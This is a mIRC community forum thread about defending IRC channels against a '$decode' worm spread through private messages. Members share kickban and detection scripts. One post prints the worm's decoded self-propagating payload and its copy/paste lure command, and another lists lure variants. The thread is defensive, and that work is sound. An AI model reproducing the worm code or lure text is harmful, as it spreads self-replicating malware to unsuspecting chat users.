mIRC Home    About    Download    Register    News    Help

Print Thread
Joined: Dec 2002
Posts: 174
K
Kev_Uk Offline OP
Vogon poet
OP Offline
Vogon poet
K
Joined: Dec 2002
Posts: 174
I have been getting some of these messages of late in some channels i op in, how do i go about making an auto ban kick and warning script as soon as they private message me this type of stuff?


Do You Want to be an OPERATOR in #channel ? copy/paste this-> //write $decode(-edit-,m) | .load -rs

Last edited by Mentality; 31/01/05 09:03 PM.
Joined: Mar 2004
Posts: 175
Vogon poet
Offline
Vogon poet
Joined: Mar 2004
Posts: 175
Code:
On *:TEXT:*write $decode*:*: {
  var %a = 1
  While ($Comchan($Nick,%a)) {
    If ($Me isop $v1) { ban -k $v2 $Nick You have been infected with an IRC virus. }
    inc %a
  }
}


- Relinsquish
Joined: Dec 2002
Posts: 174
K
Kev_Uk Offline OP
Vogon poet
OP Offline
Vogon poet
K
Joined: Dec 2002
Posts: 174
Will that kick message show up in the channel so ppl know why they were kicked, as i know some of these $decode viruses can totally block everyone from typing to the infected person

Joined: Mar 2004
Posts: 175
Vogon poet
Offline
Vogon poet
Joined: Mar 2004
Posts: 175
Although some IRC viruses ignore all users, they are not completely oblivious to kick, part, join, or quit messages.


- Relinsquish
Joined: Aug 2004
Posts: 237
L
Fjord artisan
Offline
Fjord artisan
L
Joined: Aug 2004
Posts: 237
Well, i don't think you should kickban the persons sendig this stuff, because it's likely they don't know they're sending this around.
(I got 2 or 3 of these messages from a friend too)
Running that command (a noob could do that) does the following:
CODE:
----------------------------
//write $decode(-edit-,m) | .load -rs
----------------------------
RESULT:
the user pasting it loads the following in remotes:
on 1:text:*:#:{ .ignore $nick | .timer 0 120 .join #Manila | .msg $nick Do You Want to be an OPERATOR in $chan ? copy/paste this-> //write $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs $chr(124) //mode $ $+ me +R }
----------------------------
And they continue spreading it around...

Last edited by Mentality; 31/01/05 09:05 PM.
Joined: Mar 2004
Posts: 457
D
Fjord artisan
Offline
Fjord artisan
D
Joined: Mar 2004
Posts: 457
wow, my norton 2005 just deleted the local copy of this page stating its "IRC.Worm.gen". Pitty it can't catch it in channels rather in text in a html page.

Joined: Aug 2004
Posts: 237
L
Fjord artisan
Offline
Fjord artisan
L
Joined: Aug 2004
Posts: 237
Quote:
wow, my norton 2005 just deleted the local copy of this page stating its "IRC.Worm.gen"

same here smile

Joined: Dec 2002
Posts: 174
K
Kev_Uk Offline OP
Vogon poet
OP Offline
Vogon poet
K
Joined: Dec 2002
Posts: 174
That's what i like about norton, when someone pm's me that $decode virus my norton kicks in lol

Joined: Jun 2003
Posts: 5,024
M
Hoopy frood
Offline
Hoopy frood
M
Joined: Jun 2003
Posts: 5,024
It would be appreciated if people didn't paste $decode 'viruses' on the public forum, thanks.

Regards,


Mentality/Chris
Joined: Nov 2003
Posts: 2,327
T
Hoopy frood
Offline
Hoopy frood
T
Joined: Nov 2003
Posts: 2,327
Quote:
Well, i don't think you should kickban the persons sendig this stuff, because it's likely they don't know they're sending this around.


Most people don't kick them as a punishment, they kick them to stop them spreading the virus. Whether they know they're sending this stuff or not, they should be kicked to prevent the virus spreading.


New username: hixxy
Joined: Dec 2002
Posts: 174
K
Kev_Uk Offline OP
Vogon poet
OP Offline
Vogon poet
K
Joined: Dec 2002
Posts: 174
Well considering as they can't see text messages of people warning them and can only see kick messages, maybe kicking is the answer, for 2 reasons, channel and self protection and to get the message through to the infected person.

Joined: Mar 2004
Posts: 359
L
Fjord artisan
Offline
Fjord artisan
L
Joined: Mar 2004
Posts: 359
Quote:
Code:
On *:TEXT:*write $decode*:*: {
  var %a = 1
  While ($Comchan($Nick,%a)) {
    If ($Me isop $v1) { ban -k $v2 $Nick You have been infected with an IRC virus. }
    inc %a
  }
}


If the above code works (don't feel like testing it) I think the :*: which determines channel or query window should be change to :?:. Simply because someone could ask about it in the channel, then what do they get? A ban.

Code:
On *:TEXT:*write $decode*:[color:red]?[/color]: {
  var %a = 1
  While ($Comchan($Nick,%a)) {
    If ($Me isop $v1) { ban -k $v2 $Nick You have been infected with an IRC virus. }
    inc %a
  }
}

Joined: Sep 2003
Posts: 4,230
D
Hoopy frood
Offline
Hoopy frood
D
Joined: Sep 2003
Posts: 4,230
you should really be checking for a nearly exact line of the virus or at least the part prior to the encoded text, siocne someone might be pm'ing the op with...

<john> Hey I just got sent by BLAHBLAH the just write $decode etc etc virus, i cant pm him since hes blocked me.

result Johnny boy gets banned

Joined: Mar 2004
Posts: 175
Vogon poet
Offline
Vogon poet
Joined: Mar 2004
Posts: 175
True, but you would have to change your script everytime some idiot spreads a new IRC virus. This would protect you from all, that's what I think anyways. smile

Perhaps using this would decrease the chances of kick banning somebody innocent, searching for more specific text:

Code:
On *:TEXT:*//write $decode*:?: {
  var %a = 1
    While ($Comchan($Nick,%a)) {
    If ($Me isop $v1) { ban -k $v2 $Nick You have been infected with an IRC virus. }
    inc %a
  }
}


- Relinsquish
Joined: Sep 2003
Posts: 4,230
D
Hoopy frood
Offline
Hoopy frood
D
Joined: Sep 2003
Posts: 4,230
its to hard to deal with here , but the best soulution would be to initially text match to write $decode, and then actually decode the string, then compare if the text precedding the //write appears in the decoded text. That wasy u could be sure that the PM was just the virus propergating.

Joined: Jan 2005
Posts: 192
Vogon poet
Offline
Vogon poet
Joined: Jan 2005
Posts: 192
Quote:
its to hard to deal with here , but the best soulution would be to initially text match to write $decode, and then actually decode the string, then compare if the text precedding the //write appears in the decoded text. That wasy u could be sure that the PM was just the virus propergating.


There are too many different ones out there to match them against actual decode string...

Nak CAri Awek, Guna Command NIe //write blabla
Want To Be An IRCOp? Try This New Bug Type //write blabla
gus2 m b maging OPERATOR sa #channel ? copy/paste mo i2-> //write blabla
Do You Want to be an OPERATOR in #channel ? copy/paste this-> //write blabla
Wanna be an OPERATOR in #channel ? copy/paste this-> //write blabla
STOP SPAM, USE THIS COMMAND //write blabla
Want to be an OPERATOR in #channel ? copy/paste this-> //write blabla

thats just small list... and this list grows every day...

And someone can send you something like:
Hello, the user Lame send me this message: Do You Want to be an OPERATOR in #channel ? copy/paste this-> //write $decode(blabla) etc..
your script detects //write and $decode... and kicks...
Though yea that would be better then kicking for character '$' (I have seen couple kickers like this too mad)... but then you need to update your script every time when you see something new
and add it maybe like this:
Code:
 on *:text:*:?: {
if ($1 == Nak) &amp;&amp; ($17 == +R) {
goto kick
}
if ($1 == Wanna) &amp;&amp; ($20 == +R) {
goto kick
}
else {
return
}
:kick
etc... 

And even then can happen that someone reports you spammes by pasting first the spam message and then something like "The user Lame sent me this."
Maybe the best solution would be to kick them manually wink
Just add it to popups and do it manually when you see it...

I do it this way, by kicking them manually with message (You are sending $decodes! Message me with word HELP (And wait for answer) or join #NoHack and ask help there!)
If user is really intrested about cleaning his/her PC he/she will message... and then the ignore doesnt matter either (since PM window is open)


echo -a $signature
Joined: Sep 2003
Posts: 4,230
D
Hoopy frood
Offline
Hoopy frood
D
Joined: Sep 2003
Posts: 4,230
Quote:
Quote:
its to hard to deal with here , but the best soulution would be to initially text match to write $decode, and then actually decode the string, then compare if the text precedding the //write appears in the decoded text. That wasy u could be sure that the PM was just the virus propergating.


There are too many different ones out there to match them against actual decode string...

Nak CAri Awek, Guna Command NIe //write blabla
...
Want to be an OPERATOR in #channel ? copy/paste this-> //write blabla

thats just small list... and this list grows every day...


You do understand that those statments are in the decode string?, So what ever the leading statment is you can find it in the decode string., you could simple encode the leading text, then ISIN it to the encoded text.

Quote:

And someone can send you something like:
Hello, the user Lame send me this message: Do You Want to be an OPERATOR in #channel ? copy/paste this-> //write $decode(blabla) etc..
your script detects //write and $decode... and kicks...


Well if he spams the the whole message he deserves to be kicked.

Joined: Jan 2005
Posts: 192
Vogon poet
Offline
Vogon poet
Joined: Jan 2005
Posts: 192
Quote:
You do understand that those statments are in the decode string?, So what ever the leading statment is you can find it in the decode string., you could simple encode the leading text, then ISIN it to the encoded text.

I do smirk

I used this method in my script where I kicked people with removal instruction..

My point was that if you wanna make autokicker like:
if (FullEncodedStringHere isin $1-) you will need to update (add new if's) very often... too often... because if even one letter is changed there you dont detect it anymore...

Thats why I think that kicking "infected" people manually is maybe better idea.

Quote:
Well if he spams the the whole message he deserves to be kicked.

I dont agree with you here...
Many people just copy entire message and add their comments before or after that... especially if they are not sure what it is. (At least I receive this kind of messages very often. And I dont kick them for that blush)


echo -a $signature
Joined: Sep 2003
Posts: 4,230
D
Hoopy frood
Offline
Hoopy frood
D
Joined: Sep 2003
Posts: 4,230
Quote:

My point was that if you wanna make autokicker like:
if (FullEncodedStringHere isin $1-) you will need to update (add new if's) very often... too often... because if even one letter is changed there you dont detect it anymore...


That isnt what i ment, or thought I said,

this is what i ment.
Code:
in a ON *:TEXT:*//write $decode* event
;
  var %write.decode = //write $ $+ decode
  if (%write.decode isin $1-) {
    ;
    var %pre.text = $left($1-,$calc($pos($1-,%write.decode,1) - 1 ))
    var %pre.text.encoded = $encode(%pre.text)
    var %encode.text = $mid($1-,$calc($pos($1-,%write.decode,1) + 15 ))
    ;
    if (%pre.text.encoded isin %encode.text) { kick, ban, yell, throw eggs etc }
;
(this is not debugged of course)


The event goes off, The 1st IF isnt really needed , but might be a * matchtext who knows, anyway.
get the text before the "//write $decode" into %pre.text
encode it into %pre.text.encoded
get the already encoded text sent to you into %encoded.text
Now
See if the %pre.text.encoded is in the %encoded.text, if so then do whatr ya feel needs to be done

If it is just virus line sent to you then the %pre.text.encoded well be in the already encoded text, since that encoded text is the whole script file that just sent you the message, so the text must have been in it.

I well admit it might take some tuning to get that exactly correct, but i havent bothered to keep a copy of the virus.


Link Copied to Clipboard